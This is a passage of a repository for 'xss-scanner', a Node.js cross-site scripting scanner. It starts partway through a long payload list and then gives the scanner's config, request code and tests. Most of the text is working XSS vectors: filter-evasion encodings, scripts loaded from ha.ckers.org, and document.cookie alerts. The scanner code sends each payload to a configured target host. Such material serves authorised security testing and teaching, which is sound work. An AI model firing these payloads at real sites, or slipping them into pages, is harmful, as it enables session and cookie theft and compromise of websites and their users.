215 | &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
216 | &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
217 | &lt;!--&#91;if gte IE 4&#93;&gt;
218 | &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
219 | &lt;!&#91;endif&#93;--&gt;
220 | &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
221 | &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
222 | &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
223 | &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
224 | &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
225 | a=\"get\";
226 | b=\"URL(\\"\";
227 | c=\"javascript&#058;\";
228 | d=\"alert('XSS');\\")\";
229 | eval(a+b+c+d);
230 | &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
231 | &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
232 | &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
233 | &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
234 | &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
235 | &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
236 | &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
237 | &lt;HTML&gt;&lt;BODY&gt;
238 | &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
239 | &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
240 | &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
241 | &lt;/BODY&gt;&lt;/HTML&gt;
242 | &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
243 | &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
244 | &lt;? echo('&lt;SCR)';
245 | echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
246 | &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
247 | Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
248 | &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
249 | &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
250 | &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
251 | &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
252 | &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
253 | &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
254 | &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
255 | &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
256 | &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
257 | &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
258 | &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
259 | &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
260 | &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
261 | &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
262 | &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
263 | &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
264 | &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
265 | &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
266 | &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
267 | &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
268 | &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
269 | &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
270 | &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
271 | &lt;
272 | %3C
273 | &lt
274 | &lt;
275 | &LT
276 | &LT;
277 | &#60
278 | &#060
279 | &#0060
280 | &#00060
281 | &#000060
282 | &#0000060
283 | &lt;
284 | &#x3c
285 | &#x03c
286 | &#x003c
287 | &#x0003c
288 | &#x00003c
289 | &#x000003c
290 | &#x3c;
291 | &#x03c;
292 | &#x003c;
293 | &#x0003c;
294 | &#x00003c;
295 | &#x000003c;
296 | &#X3c
297 | &#X03c
298 | &#X003c
299 | &#X0003c
300 | &#X00003c
301 | &#X000003c
302 | &#X3c;
303 | &#X03c;
304 | &#X003c;
305 | &#X0003c;
306 | &#X00003c;
307 | &#X000003c;
308 | &#x3C
309 | &#x03C
310 | &#x003C
311 | &#x0003C
312 | &#x00003C
313 | &#x000003C
314 | &#x3C;
315 | &#x03C;
316 | &#x003C;
317 | &#x0003C;
318 | &#x00003C;
319 | &#x000003C;
320 | &#X3C
321 | &#X03C
322 | &#X003C
323 | &#X0003C
324 | &#X00003C
325 | &#X000003C
326 | &#X3C;
327 | &#X03C;
328 | &#X003C;
329 | &#X0003C;
330 | &#X00003C;
331 | &#X000003C;
332 | \x3c
333 | \x3C
334 | \u003c
335 | \u003C
336 | &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
337 | &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
338 | &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
339 | &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
340 | &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
341 | &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
342 | &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
343 | &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
344 | &lt;IMG SRC=\"   javascript&#058;alert('XSS');\"&gt;
345 | perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
346 | perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
347 | &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
348 | &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
349 | &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
350 | &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
351 | &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
352 | &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
353 | &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
354 | &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
355 | &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
356 | &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
357 | &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
358 | &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
359 | &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
360 | &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
361 | '';!--\"&lt;XSS&gt;=&{()}
362 | ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
363 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
364 | '';!--"<XSS>=&{()}
365 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
366 | <IMG SRC="javascript:alert('XSS');">
367 | <IMG SRC=javascript:alert('XSS')>
368 | <IMG SRC=javascrscriptipt:alert('XSS')>
369 | <IMG SRC=JaVaScRiPt:alert('XSS')>
370 | <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
371 | <IMG SRC=" &#14;  javascript:alert('XSS');">
372 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
373 | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
374 | <<SCRIPT>alert("XSS");//<</SCRIPT>
375 | <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
376 | \";alert('XSS');//
377 | </TITLE><SCRIPT>alert("XSS");</SCRIPT>
378 | ¼script¾alert(¢XSS¢)¼/script¾
379 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
380 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
381 | <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
382 | <TABLE BACKGROUND="javascript:alert('XSS')">
383 | <TABLE><TD BACKGROUND="javascript:alert('XSS')">
384 | <DIV STYLE="background-image: url(javascript:alert('XSS'))">
385 | <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
386 | <DIV STYLE="width: expression(alert('XSS'));">
387 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
388 | <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
389 | <XSS STYLE="xss:expression(alert('XSS'))">
390 | exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
391 | <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
392 | a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
393 | <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
394 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
395 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
396 | <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
397 | <form><button formaction="javascript:alert(123)">crosssitespt
398 | <frameset onload=alert(123)>
399 | <!--<img src="--><img src=x onerror=alert(123)//">
400 | <style><img src="</style><img src=x onerror=alert(123)//">
401 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
402 | <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
403 | <embed src="javascript:alert(1)">
404 | <? foo="><script>alert(1)</script>">
405 | <! foo="><script>alert(1)</script>">
406 | </ foo="><script>alert(1)</script>">
407 | <script>({0:#0=alert/#0#/#0#(123)})</script>
408 | <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
409 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
410 | <script src="#">{alert(1)}</script>;1
411 | <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
412 | <svg xmlns="#"><script>alert(1)</script></svg>
413 | <svg onload="javascript:alert(123)" xmlns="#"></svg>
414 | <iframe xmlns="#" src="javascript:alert(1)"></iframe>
415 | +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
416 | %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
417 | +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
418 | %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
419 | %253cscript%253ealert(document.cookie)%253c/script%253e
420 | “><s”%2b”cript>alert(document.cookie)</script>
421 | “><ScRiPt>alert(document.cookie)</script>
422 | “><<script>alert(document.cookie);//<</script>
423 | foo<script>alert(document.cookie)</script>
424 | <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
425 | %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
426 | ‘; alert(document.cookie); var foo=’
427 | foo\’; alert(document.cookie);//’;
428 | </script><script >alert(document.cookie)</script>
429 | <img src=asdf onerror=alert(document.cookie)>
430 | <BODY ONLOAD=alert(’XSS’)>
431 | <script>alert(1)</script>
432 | "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
433 | <video src=1 onerror=alert(1)>
434 | <audio src=1 onerror=alert(1)>
435 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "xss-scanner",
 3 |   "version": "0.0.9",
 4 |   "description": "Cross-Site Scripting (XSS) scanner.  This tool helps to find possible XSS vulnerabilities.",
 5 |   "keywords" : [ "xss", "xss-vulnerability", "xss-detection", "xss-exploitation", "xss-scanner" ],
 6 |   "repository": {
 7 |     "type": "git",
 8 |     "url": "https://github.com/dragthor/xss-scanner.git"
 9 |   },
10 |   "scripts": {
11 |     "start": "node src/payload.js",
12 |     "test" : "mocha --reporter progress \"tests/**/*.test.js\""
13 |   },
14 |   "author": "Kris Krause",
15 |   "license": "MIT",
16 |   "engines": {
17 |     "node" : ">=6.9.5",
18 |     "npm": ">=3.10.10"
19 |   },
20 |   "dependencies": {
21 |     "node-uuid": "1.4.7",
22 |     "chalk": "1.1.3"
23 |   },
24 |   "devDependencies": {
25 |     "node-uuid": "1.4.7",
26 |     "chalk": "1.1.3",
27 |     "chai": "3.5.0",
28 |     "mocha": "3.2.0"
29 |   }
30 | }


--------------------------------------------------------------------------------
/src/config.js:
--------------------------------------------------------------------------------
 1 | module.exports = {
 2 |     xssOptions
 3 | }
 4 | 
 5 | function xssOptions() {
 6 |     return {
 7 |         // Proxy Config - one example, watch req/res through Fiddler.
 8 |         // proxy: {
 9 |         //     host: "127.0.0.1",
10 |         //     port: 8888
11 |         // },
12 | 
13 |         payloadFile: "data/payload.test.txt",
14 |         fileOutput: false,
15 |         host: "www.yourwebsite.com",
16 |         port: 80,
17 |         path: "/special.plp?page={0}",
18 |         method: "POST",
19 |         protocol: "http:",
20 |         postData: "paramName1={0}&paramName2=paramValue2"
21 |     };
22 | }


--------------------------------------------------------------------------------
/src/payload.js:
--------------------------------------------------------------------------------
 1 | var { stringFormat, ripPayload } = require('./util');
 2 | var { xssOptions } = require('./config');
 3 | 
 4 | const http = require("http");
 5 | const fs = require("fs");
 6 | const uuid = require("node-uuid");
 7 | const chalk = require("chalk");
 8 | 
 9 | const config = xssOptions();
10 | 
11 | var attack = function (line) {
12 |     try {
13 |         var reqOptions = {
14 |             host: config.host,
15 |             port: config.port,
16 |             protocol: config.protocol,
17 |             method: config.method,
18 |             path: stringFormat(config.path, escape(line)),
19 |             headers: {
20 |                 "User-Agent": "xss-scanner"
21 |             }
22 |         };
23 | 
24 |         if (config.proxy) {
25 |             reqOptions.host = config.proxy.host;
26 |             reqOptions.port = config.proxy.port;
27 |             reqOptions.headers["Host"] = config.host;
28 |         }
29 | 
30 |         if (config.method === "POST") {
31 |             reqOptions.headers["Content-Type"] = "application/x-www-form-urlencoded";
32 |             reqOptions.headers["Content-Length"] = Buffer.byteLength(stringFormat(config.postData, line));
33 |         }
34 | 
35 |         var request = http.request(reqOptions, (res) => {
36 |             const statusCode = res.statusCode;
37 | 
38 |             var rawData = "";
39 |             res.on("data", (chunk) => {
40 |                 rawData += chunk;
41 |             });
42 | 
43 |             res.on("end", () => {
44 |                 if (statusCode != 200) return;
45 |                 if (rawData == null || rawData.length === 0) return;
46 | 
47 |                 rawData = "<!-- <![CDATA[ " + line + "]]> -->" + rawData;
48 | 
49 |                 console.log(chalk.red(line));
50 | 
51 |                 if (config.fileOutput === false) return;
52 | 
53 |                 fs.writeFile("output/" + uuid.v4() + ".html", rawData, (err) => {
54 |                     if (err) {
55 |                         console.log(chalk.red(err + " - output file"));
56 |                     }
57 |                 });
58 |             });
59 |         });
60 | 
61 |         if (config.method === "POST") {
62 |             request.write(stringFormat(config.postData, line));
63 |         }
64 | 
65 |         request.end();
66 |     } catch (err) {
67 |         console.log(chalk.red(err + " - " + line));
68 |     }
69 | };
70 | 
71 | ripPayload(config.payloadFile, attack);


--------------------------------------------------------------------------------
/src/util.js:
--------------------------------------------------------------------------------
 1 | module.exports = {
 2 | 	stringFormat,
 3 |     ripPayload
 4 | }
 5 | 
 6 | const readline = require("readline");
 7 | const fs = require("fs");
 8 | 
 9 | // Thanks ASP.NET AJAX 1.0 Source Code Released
10 | // https://weblogs.asp.net/scottgu/asp-net-ajax-1-0-source-code-released
11 | function stringFormat (s) {
12 |     for (var i = 0; i < arguments.length - 1; i++) {
13 |         var reg = new RegExp("\\{" + i + "\\}", "gm");
14 |         s = s.replace(reg, arguments[i + 1]);
15 |     }
16 |     return s;
17 | };
18 | 
19 | function ripPayload(pathToPayload, attackCallback, doneCallback) {
20 |     let payloadReader = readline.createInterface({
21 |         input: fs.createReadStream(pathToPayload)
22 |     });
23 | 
24 |     payloadReader.on("line", (line) => {
25 |         if (line.length === 0) return;
26 | 
27 |         attackCallback(line);
28 |     });
29 | 
30 |     payloadReader.on("close", () => {
31 |         if (doneCallback) {
32 |             doneCallback();
33 |         }
34 |     });
35 | };


--------------------------------------------------------------------------------
/tests/util.test.js:
--------------------------------------------------------------------------------
 1 | var { stringFormat, ripPayload } = require('../src/util');
 2 | 
 3 | const chai = require("chai");
 4 | const expect = chai.expect;
 5 | 
 6 | describe("stringFormat", () => {
 7 |     it("should handle single token", () => {
 8 |         let actual = stringFormat("/whatever.php?foo={0}", "bar");
 9 | 
10 |         expect(actual).to.equal("/whatever.php?foo=bar");
11 |     });
12 | 
13 |     it("should handle multiple tokens", () => {
14 |         let actual = stringFormat("/whatever.php?foo={0}&fizz={1}", "bar", "buzz");
15 | 
16 |         expect(actual).to.equal("/whatever.php?foo=bar&fizz=buzz");
17 |     });
18 | });
19 | 
20 | describe("ripPayload", () => {
21 |     it("should rip line by line the input and invoke callback", (done) => {
22 |         let actualAttacks = 0;
23 | 
24 |         ripPayload("data/payload.test.txt", (line) => {
25 |             actualAttacks++;
26 |         }, () => {
27 |             expect(actualAttacks).to.equal(12);
28 |             done();
29 |         });
30 |     });
31 | });


--------------------------------------------------------------------------------